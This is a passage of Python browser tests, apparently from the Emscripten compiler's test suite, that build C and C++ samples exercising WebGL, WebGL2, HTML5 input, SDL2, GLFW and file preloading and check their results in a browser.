self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure=1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
